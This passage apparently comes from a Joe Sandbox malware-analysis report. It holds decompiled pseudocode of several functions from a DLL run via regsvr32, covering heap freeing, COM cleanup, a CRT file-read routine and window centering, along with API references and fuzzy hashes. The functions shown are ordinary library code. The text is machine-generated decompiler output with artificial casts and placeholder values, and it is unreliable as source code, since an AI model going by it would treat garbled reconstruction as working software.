						_t142 =  *0x1004b0d8; // 0x0
						_t61 =  *0x1004b0e4; // 0x0
						_t12 = _t125 + 1; // 0x1
						 *(_t196 + 0x18) = 0;
						if( *((intOrPtr*)(_t164 + 0xc)) - (_t173 * _t142 + _t12 * _t159 + _t61 << 1) <= 0) {
							L8:
							 *0x1004d3e0((_t61 << 4) - ((_t142 * _t142 << 4) + 0x10) * _t159 +  *((intOrPtr*)(_t164 + 8)));
							_t196 = _t196 + 4;
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t96 =  *0x1004b0dc; // 0x0
							_t177 =  *0x1004b0e8; // 0x0
							 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t164 + 8));
							if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)) + ( *(_t196 + 0x18) + ((_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 2 + (_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 4)) != 0) {
								_t189 =  *0x1004b0e4; // 0x0
								_t25 = _t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 - 2; // -268742890
								 *((intOrPtr*)(_t164 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x14)) + ((_t125 - (_t142 * _t142 << 1) + _t125 + 2) *  *0x1004b0e4 +  *((intOrPtr*)(_t196 + 0x1c)) + (_t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 + _t25) * _t96 + (_t159 + 1) * _t125 * 2) * 4)),  *((intOrPtr*)(_t164 + 0x34)));
								_t142 =  *0x1004b0d8; // 0x0
								_t159 =  *0x1004b0ec; // 0x0
								_t125 =  *0x1004b0e0; // 0x0
								_t96 =  *0x1004b0dc; // 0x0
								_t196 = _t196 + 8;
							}
							_t61 =  *0x1004b0e4; // 0x0
							 *(_t196 + 0x18) =  *(_t196 + 0x18) + 1;
							_t37 = _t125 + 1; // 0x1
						} while ( *(_t196 + 0x18) <  *((intOrPtr*)(_t164 + 0xc)) - (_t96 * _t142 + _t37 * _t159 + _t61 << 1));
						goto L8;
					}
				}
				return _t51;
			}

0x10004dd2
0x10004dd8
0x10004de6
0x10004de8
0x10004dee
0x10004df4
0x10004dfd
0x10004e06
0x10004e1d
0x10004e2f
0x10004e2f
0x10004e31
0x10004e37
0x10004e43
0x10004e4c
0x10004e52
0x10004e6c
0x10004e75
0x10004e7a
0x10004fbd
0x10004fbd
0x10004fc2
0x10004fc7
0x10004fcc
0x10004fd3
0x10004ff4
0x1000501f
0x10005022
0x00000000
0x10004e80
0x10004e80
0x10004e86
0x10004e8c
0x10004e92
0x10004e98
0x10004ea0
0x10004eb3
0x10004ebb
0x10004f9b
0x10004fb4
0x10004fba
0x00000000
0x00000000
0x00000000
0x00000000
0x10004ec1
0x10004ec1
0x10004ec4
0x10004eca
0x10004ed0
0x10004ef3
0x10004efc
0x10004f1d
0x10004f51
0x10004f54
0x10004f5a
0x10004f60
0x10004f66
0x10004f6c
0x10004f6c
0x10004f76
0x10004f7c
0x10004f80
0x10004f91
0x00000000
0x10004ec1
0x10004e7a
0x1000503a

APIs

??3@YAXPAX@Z.MSVCRT ref: 10004E6C
??3@YAXPAX@Z.MSVCRT ref: 10004FB4
GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 10005028
HeapFree.KERNEL32(00000000), ref: 1000502F

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ??3@Heap$FreeProcess
String ID:
API String ID: 834397476-0
Opcode ID: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
Instruction ID: 9f87828e50faab3a5d058e3d57900a61c1aef8edd5c1bc6d424dad7412e7468d
Opcode Fuzzy Hash: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
Instruction Fuzzy Hash: 94719631200B158FE318DF6CCEC5A57B7A9FB89341B05C52ED926CB7A5E670E905CB48

Uniqueness

Uniqueness Score: -1.00%

Function 1000E9AF Relevance: 6.2, APIs: 4, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E1000E9AF(intOrPtr __ecx, intOrPtr* __edi) {
				void* __ebx;
				void* __esi;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t91;
				intOrPtr _t104;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t148;
				intOrPtr* _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				intOrPtr _t167;
				intOrPtr* _t168;
				void* _t170;
				intOrPtr _t183;

				_t161 = __edi;
				E10011BF0(0x1003af91, _t170);
				_t167 = __ecx;
				 *((intOrPtr*)(_t170 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1004060c;
				 *(_t170 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t121 =  *((intOrPtr*)(__ecx + 0x50));
					if(_t121 != 0) {
						_t122 =  *_t121;
						_push(_t170 - 0x14);
						_push(0x10043208);
						_push(_t122);
						if( *((intOrPtr*)( *_t122))() >= 0) {
							_t124 =  *((intOrPtr*)(_t170 - 0x14));
							_push(_t170 - 0x10);
							_push(0x10043348);
							 *((intOrPtr*)(_t170 - 0x10)) = 0;
							_push(_t124);
							if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
								_t128 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
								_t130 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t130 + 8))(_t130);
							}
							_t126 =  *((intOrPtr*)(_t170 - 0x14));
							 *((intOrPtr*)( *_t126 + 8))(_t126);
						}
					}
				}
				_push(_t161);
				L8:
				if( *((intOrPtr*)(_t167 + 0x24)) != 0) {
					_t161 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x1c)) + 8));
					 *((intOrPtr*)( *((intOrPtr*)( *_t161)) + 0xbc))( *((intOrPtr*)(_t161 + 8)), 0);
					 *((intOrPtr*)( *_t161 + 0x94)) = 0;
					goto L8;
				}
				 *((intOrPtr*)(_t170 - 0x18)) = _t167 + 0x18;
				E1001E047(_t167 + 0x18);
				if( *((intOrPtr*)(_t167 + 0x40)) == 0) {
					L16:
					_t87 =  *((intOrPtr*)(_t167 + 8));
					if(_t87 != 0) {
						 *((intOrPtr*)( *_t87 + 8))(_t87);
					}
					_t88 =  *((intOrPtr*)(_t167 + 0xc));
					if(_t88 != 0) {
						 *((intOrPtr*)( *_t88 + 8))(_t88);
					}
					if( *((intOrPtr*)(_t167 + 0x14)) == 0) {
						L29:
						_t89 =  *((intOrPtr*)(_t167 + 0x34));
						if(_t89 != 0) {
							__imp__CoTaskMemFree(_t89);
						}
						_t138 =  *((intOrPtr*)(_t167 + 0x54));
						if( *((intOrPtr*)(_t167 + 0x54)) != 0) {
							E1000DA8C(_t138, _t161,  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x50)))));
							E10009EC5( *((intOrPtr*)(_t167 + 0x54)));
						}
						_t162 =  *((intOrPtr*)(_t167 + 0x54));
						_t195 = _t162;
						if(_t162 != 0) {
							E10009EC5(_t162);
							_push(_t162);
							L1001F7A9(0, _t162, _t167, _t195);
						}
						_t163 =  *((intOrPtr*)(_t167 + 0x50));
						_t196 = _t163;
						if(_t163 != 0) {
							E1000E731(_t163, _t196);
							_push(_t163);
							L1001F7A9(0, _t163, _t167, _t196);
						}
						_t90 =  *((intOrPtr*)(_t167 + 0x4c));
						if(_t90 != 0) {
							 *((intOrPtr*)( *_t90 + 8))(_t90);
						}
						_t168 =  *((intOrPtr*)(_t167 + 0x48));
						if(_t168 != 0) {
							 *((intOrPtr*)( *_t168 + 8))(_t168);
						}
						 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
						_t91 = E1001E10D( *((intOrPtr*)(_t170 - 0x18)));
						 *[fs:0x0] =  *((intOrPtr*)(_t170 - 0xc));
						return _t91;
					} else {
						 *((intOrPtr*)(_t170 - 0x10)) = 0;
						if( *((intOrPtr*)(_t167 + 0x10)) <= 0) {
							L28:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t167 + 0x14)));
							goto L29;
						}
						_t165 = 0;
						do {
							_t104 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)) + 4));
							 *((intOrPtr*)(_t170 - 0x14)) = _t104;
							if(_t104 == 0) {
								goto L25;
							} else {
								goto L24;
							}
							do {
								L24:
								 *((intOrPtr*)( *((intOrPtr*)(E10006D96(_t170 - 0x14))) + 0x94)) = 0;
							} while ( *((intOrPtr*)(_t170 - 0x14)) != 0);
							L25:
							E1001E047( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)));
							_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24));
							if(_t148 != 0) {
								 *((intOrPtr*)( *_t148 + 4))(1);
							}
							 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 1;
							_t165 = _t165 + 0x28;
						} while ( *((intOrPtr*)(_t170 - 0x10)) <  *((intOrPtr*)(_t167 + 0x10)));
						goto L28;
					}
				}
				_t161 = 0;
				if( *((intOrPtr*)(_t167 + 0x38)) <= 0) {
					L14:
					if(_t183 != 0) {
						_push( *((intOrPtr*)(_t167 + 0x3c)));
						L1001F7A9(0, _t161, _t167, _t183);
						_push( *((intOrPtr*)(_t167 + 0x40)));
						L1001F7A9(0, _t161, _t167, _t183);
					}
					goto L16;
				}
				 *((intOrPtr*)(_t170 - 0x10)) = 0;
				do {
					__imp__#9( *((intOrPtr*)(_t167 + 0x40)) +  *((intOrPtr*)(_t170 - 0x10)));
					 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 0x10;
					_t161 = _t161 + 1;
				} while (_t161 <  *((intOrPtr*)(_t167 + 0x38)));
				_t183 =  *((intOrPtr*)(_t167 + 0x38));
				goto L14;
			}

0x1000e9af
0x1000e9b4
0x1000e9be
0x1000e9c0
0x1000e9c3
0x1000e9ce
0x1000e9d1
0x1000e9d3
0x1000e9d8
0x1000e9da
0x1000e9e1
0x1000e9e2
0x1000e9e7
0x1000e9ec
0x1000e9ee
0x1000e9f4
0x1000e9f5
0x1000e9fa
0x1000e9ff
0x1000ea05
0x1000ea07
0x1000ea10
0x1000ea13
0x1000ea19
0x1000ea19
0x1000ea1c
0x1000ea22
0x1000ea22
0x1000e9ec
0x1000e9d8
0x1000ea25
0x1000ea44
0x1000ea47
0x1000ea2b
0x1000ea36
0x1000ea3e
0x00000000
0x1000ea3e
0x1000ea4c
0x1000ea4f
0x1000ea57
0x1000ea91
0x1000ea91
0x1000ea96
0x1000ea9b
0x1000ea9b
0x1000ea9e
0x1000eaa3
0x1000eaa8
0x1000eaa8
0x1000eaae
0x1000eb1d
0x1000eb1d
0x1000eb22
0x1000eb25
0x1000eb25
0x1000eb2b
0x1000eb30
0x1000eb37
0x1000eb3f
0x1000eb3f
0x1000eb44
0x1000eb47
0x1000eb49
0x1000eb4d
0x1000eb52
0x1000eb53
0x1000eb58
0x1000eb59
0x1000eb5c
0x1000eb5e
0x1000eb62
0x1000eb67
0x1000eb68
0x1000eb6d
0x1000eb6e
0x1000eb74
0x1000eb79
0x1000eb79
0x1000eb7c
0x1000eb81
0x1000eb86
0x1000eb86
0x1000eb8c
0x1000eb90
0x1000eb9a
0x1000eba2
0x1000eab0
0x1000eab3
0x1000eab6
0x1000eb14
0x1000eb17
0x00000000
0x1000eb17
0x1000eab8
0x1000eaba
0x1000eac1
0x1000eac6
0x1000eac9
0x00000000
0x00000000
0x00000000
0x00000000
0x1000eacb
0x1000eacb
0x1000eae0
0x1000eae0
0x1000eae8
0x1000eaef
0x1000eaf7
0x1000eafd
0x1000eb03
0x1000eb03
0x1000eb06
0x1000eb0c
0x1000eb0f
0x00000000
0x1000eaba
0x1000eaae
0x1000ea59
0x1000ea5e
0x1000ea7d
0x1000ea7d
0x1000ea7f
0x1000ea82
0x1000ea87
0x1000ea8a
0x1000ea90
0x00000000
0x1000ea7d
0x1000ea60
0x1000ea63
0x1000ea6a
0x1000ea70
0x1000ea74
0x1000ea75
0x1000ea7a
0x00000000

APIs

__EH_prolog.LIBCMT ref: 1000E9B4
VariantClear.OLEAUT32(?), ref: 1000EA6A
CoTaskMemFree.OLE32(?), ref: 1000EB17
CoTaskMemFree.OLE32(?), ref: 1000EB25

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeTask$ClearH_prologVariant
String ID:
API String ID: 82050969-0
Opcode ID: 49f28926b3a515cc494aedc195bb947ea9c7f92216f3cce8caedecae21e31748
Instruction ID: 43d2ea8d123215d3b84d8545f0b19a771d1917bb58f1b2237b0c9da6e0f617ce
Opcode Fuzzy Hash: 49f28926b3a515cc494aedc195bb947ea9c7f92216f3cce8caedecae21e31748
Instruction Fuzzy Hash: 3E712675A00682DFDB24CFA4C9C486AB7F5FF49380715486DE156AB665CB30FC81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1001B36C Relevance: 6.2, APIs: 4, Instructions: 167
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001B36C(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t79;
				void* _t82;
				signed int _t86;
				signed int* _t89;
				long _t90;
				void* _t92;
				intOrPtr _t93;
				signed int _t97;
				intOrPtr _t98;
				char _t100;
				signed int _t101;
				long _t103;
				long _t106;
				signed int _t107;
				signed int _t113;
				signed int _t114;
				signed char _t117;
				intOrPtr _t118;
				long _t120;
				void* _t124;
				intOrPtr* _t125;
				signed int _t127;
				signed char* _t128;
				void* _t129;
				void* _t130;

				_v12 = _v12 & 0x00000000;
				_t113 = _a8;
				_t124 = _t113;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t79 = _a4;
				_t125 = 0x1004f920 + (_t79 >> 5) * 4;
				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
				_t82 =  *_t125 + _t127;
				_t117 =  *((intOrPtr*)(_t82 + 4));
				if((_t117 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
					_a12 = _a12 - 1;
					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
					_t124 = _t113 + 1;
					_v12 = 1;
					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
				}
				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
					_t86 = _v16;
					_t118 =  *_t125;
					_v12 = _v12 + _t86;
					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t86;
					if(_t86 == 0) {
						L15:
						_t89 =  *_t125 + _t127 + 4;
						 *_t89 =  *_t89 & 0x000000fb;
						__eflags =  *_t89;
						L16:
						_t90 = _a8;
						_t120 = _v12 + _t90;
						__eflags = _t90 - _t120;
						_a12 = _t90;
						_v12 = _t120;
						if(_t90 >= _t120) {
							L40:
							_t114 = _t113 - _a8;
							__eflags = _t114;
							_v12 = _t114;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t92 =  *_a12;
							__eflags = _t92 - 0x1a;
							if(_t92 == 0x1a) {
								break;
							}
							__eflags = _t92 - 0xd;
							if(_t92 == 0xd) {
								__eflags = _a12 - _t120 - 1;
								if(_a12 >= _t120 - 1) {
									_a12 = _a12 + 1;
									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
									__eflags = _t97;
									if(_t97 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t113 = 0xd;
											L35:
											_t113 = _t113 + 1;
											__eflags = _t113;
											L36:
											_t120 = _v12;
											__eflags = _a12 - _t120;
											if(_a12 < _t120) {
												continue;
											}
											goto L40;
										}
										_t98 =  *_t125;
										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
											__eflags = _t113 - _a8;
											if(__eflags != 0) {
												L33:
												E1001968C(__eflags, _a4, 0xffffffff, 1);
												_t130 = _t130 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t113 = 0xa;
											goto L35;
										}
										_t100 = _v5;
										__eflags = _t100 - 0xa;
										if(_t100 == 0xa) {
											goto L32;
										}
										 *_t113 = 0xd;
										 *((char*)( *_t125 + _t127 + 5)) = _t100;
										goto L35;
									}
									_t101 = GetLastError();
									__eflags = _t101;
									if(_t101 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t103 = _a12 + 1;
								__eflags =  *_t103 - 0xa;
								if( *_t103 != 0xa) {
									_a12 = _t103;
									goto L34;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t113 = _t92;
							_t113 = _t113 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t93 =  *_t125;
						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
							_t128 = _t93 + _t127 + 4;
							 *_t128 =  *_t128 | 0x00000002;
							__eflags =  *_t128;
						}
						goto L40;
					}
					__eflags =  *_t113 - 0xa;
					if( *_t113 != 0xa) {
						goto L15;
					}
					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
					goto L16;
				} else {
					_t106 = GetLastError();
					_t129 = 5;
					if(_t106 != _t129) {
						__eflags = _t106 - 0x6d;
						if(_t106 == 0x6d) {
							goto L42;
						}
						_t107 = E10013707(_t106);
						L10:
						return _t107 | 0xffffffff;
					}
					 *((intOrPtr*)(E100136F5())) = 9;
					_t107 = E100136FE();
					 *_t107 = _t129;
					goto L10;
				}
			}

0x1001b372
0x1001b37b
0x1001b380
0x1001b382
0x1001b540
0x1001b540
0x00000000
0x1001b540
0x1001b388
0x1001b396
0x1001b39f
0x1001b3a2
0x1001b3a4
0x1001b3aa
0x00000000
0x00000000
0x1001b3b3
0x1001b3c1
0x1001b3c4
0x1001b3c8
0x1001b3cb
0x1001b3d2
0x1001b3d2
0x1001b3ee
0x1001b429
0x1001b42c
0x1001b42e
0x1001b431
0x1001b436
0x1001b53b
0x00000000
0x1001b53b
0x1001b43c
0x1001b43e
0x1001b450
0x1001b452
0x1001b456
0x1001b456
0x1001b459
0x1001b459
0x1001b45f
0x1001b461
0x1001b463
0x1001b466
0x1001b469
0x1001b535
0x1001b535
0x1001b535
0x1001b538
0x00000000
0x00000000
0x00000000
0x00000000
0x1001b46f
0x1001b46f
0x1001b472
0x1001b474
0x1001b476
0x00000000
0x00000000
0x1001b47c
0x1001b47e
0x1001b48c
0x1001b48f
0x1001b4a5
0x1001b4b9
0x1001b4bf
0x1001b4c1
0x1001b4cd
0x1001b4cd
0x1001b4d1
0x1001b513
0x1001b513
0x1001b516
0x1001b516
0x1001b516
0x1001b517
0x1001b517
0x1001b51a
0x1001b51d
0x00000000
0x00000000
0x00000000
0x1001b523
0x1001b4d3
0x1001b4d5
0x1001b4da
0x1001b4ee
0x1001b4f1
0x1001b4fe
0x1001b505
0x1001b50a
0x1001b50d
0x1001b511
0x00000000
0x00000000
0x00000000
0x1001b511
0x1001b4f3
0x1001b4f7
0x00000000
0x00000000
0x1001b4f9
0x1001b4f9
0x00000000
0x1001b4f9
0x1001b4dc
0x1001b4df
0x1001b4e1
0x00000000
0x00000000
0x1001b4e3
0x1001b4e8
0x00000000
0x1001b4e8
0x1001b4c3
0x1001b4c9
0x1001b4cb
0x00000000
0x00000000
0x00000000
0x1001b4cb
0x1001b494
0x1001b495
0x1001b498
0x1001b4a0
0x00000000
0x1001b4a0
0x1001b49a
0x00000000
0x1001b49a
0x1001b480
0x1001b482
0x1001b483
0x00000000
0x1001b483
0x1001b525
0x1001b527
0x1001b52c
0x1001b52e
0x1001b532
0x1001b532
0x1001b532
0x00000000
0x1001b52c
0x1001b440
0x1001b443
0x00000000
0x00000000
0x1001b44b
0x00000000
0x1001b3f0
0x1001b3f0
0x1001b3f8
0x1001b3fb
0x1001b411
0x1001b414
0x00000000
0x00000000
0x1001b41b
0x1001b421
0x00000000
0x1001b421
0x1001b402
0x1001b408
0x1001b40d
0x00000000
0x1001b40d

APIs

ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 1001B3E6
GetLastError.KERNEL32(?,?,?), ref: 1001B3F0
ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 1001B4B9
GetLastError.KERNEL32(?,?,?), ref: 1001B4C3

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
Instruction ID: 3bbfbaef22ec515d269d62fd47d355a82d48074a4c8ee7a64ff4f0343116150f
Opcode Fuzzy Hash: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
Instruction Fuzzy Hash: DB61D374A04B89DFDB21CFA8C880B997BF0EF05354F158099E9618F2A2D770DAC1CB11

Uniqueness

Uniqueness Score: -1.00%

Function 1000E58F Relevance: 6.2, APIs: 4, Instructions: 165
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E1000E58F(void* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t84;
				void* _t107;
				void* _t126;
				intOrPtr _t130;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t135;
				intOrPtr _t136;
				void* _t137;

				_t126 = __edx;
				_t135 = __ecx;
				_t130 = E10023092( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
				_v12 = _t130;
				_t58 = IsWindowVisible( *(_t130 + 0x1c));
				asm("sbb eax, eax");
				_t60 =  ~_t58 + 1;
				_v24 = _t60;
				_t107 = 0;
				if(_t60 != 0) {
					GetWindowRect( *(E100220EE(_t137, GetDesktopWindow()) + 0x1c),  &_v56);
					GetWindowRect( *(_t130 + 0x1c),  &_v40);
					asm("cdq");
					asm("cdq");
					E1002036F(_t130, _v56.right - _v56.left - _t126 >> 1, _v56.bottom - _v56.top - _t126 >> 1, _t107, _t107, _t107);
					E100203AD(_t130, 1);
				}
				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
				_t131 = _t135 + 0x48;
				_push(_t131);
				_push(0x100405f8);
				_push(_t62);
				if( *((intOrPtr*)( *_t62))() < 0) {
					_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
					_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x10040550,  &_v16);
					if(_t66 >= _t107) {
						_t67 = _v16;
						 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
						_t69 = _v16;
						 *((intOrPtr*)( *_t69 + 8))(_t69);
						_t71 = _v20;
						if(_t71 != _t107) {
							_t133 = _t135 + 8;
							_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x10042ff8, _t133);
							_t73 = _v20;
							 *((intOrPtr*)( *_t73 + 8))(_t73);
							_t66 = _v8;
							if(_t66 >= _t107) {
								_t134 =  *_t133;
								 *((intOrPtr*)( *_t134))(_t134, 0x10042fe8, _t135 + 0xc);
								goto L14;
							}
						} else {
							_t66 = 0x80004005;
						}
					}
				} else {
					_t84 =  *_t131;
					_t134 = _t135 + 0x4c;
					_v8 =  *((intOrPtr*)( *_t84 + 0xc))(_t84, _t107, 0x10043298, _t134);
					if( *_t134 == _t107) {
						_v8 = 0x80004003;
					}
					if(_v8 >= _t107) {
						L14:
						_t136 = E1000E14F(_t107, _t135, _t134, _t135);
						if(_v24 != _t107) {
							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E100203AD(_v12, _t107);
						}
						_t66 = _t136;
					} else {
						if(_v24 != _t107) {
							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E100203AD(_v12, _t107);
						}
						_t66 = _v8;
					}
				}
				return _t66;
			}

0x1000e58f
0x1000e597
0x1000e5a5
0x1000e5aa
0x1000e5ad
0x1000e5b5
0x1000e5b7
0x1000e5ba
0x1000e5bd
0x1000e5be
0x1000e5d3
0x1000e5e0
0x1000e5ed
0x1000e5fd
0x1000e603
0x1000e60c
0x1000e60c
0x1000e614
0x1000e619
0x1000e61c
0x1000e61d
0x1000e622
0x1000e627
0x1000e688
0x1000e697
0x1000e69b
0x1000e6a1
0x1000e6ab
0x1000e6ae
0x1000e6b4
0x1000e6b7
0x1000e6bc
0x1000e6c7
0x1000e6d3
0x1000e6d6
0x1000e6dc
0x1000e6df
0x1000e6e4
0x1000e6e6
0x1000e6f4
0x00000000
0x1000e6f4
0x1000e6be
0x1000e6be
0x1000e6be
0x1000e6bc
0x1000e629
0x1000e629
0x1000e62d
0x1000e63d
0x1000e640
0x1000e642
0x1000e642
0x1000e64c
0x1000e6f6
0x1000e700
0x1000e702
0x1000e71c
0x1000e725
0x1000e725
0x1000e72a
0x1000e652
0x1000e655
0x1000e66f
0x1000e678
0x1000e678
0x1000e67d
0x1000e67d
0x1000e64c
0x1000e730

APIs

IsWindowVisible.USER32 ref: 1000E5AD
GetDesktopWindow.USER32 ref: 1000E5C0
GetWindowRect.USER32 ref: 1000E5D3
GetWindowRect.USER32 ref: 1000E5E0

Part of subcall function 1002036F: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,1000E721,?,?), ref: 1002038A

Part of subcall function 100203AD: ShowWindow.USER32(?,?,1000E72A,00000000,?,?), ref: 100203BA

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$DesktopMoveShowVisible
String ID:
API String ID: 3835705305-0
Opcode ID: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
Instruction ID: 525efb47f72b729c7b32d6b473f79529eff02a82a59350a91d8b9bca58045246
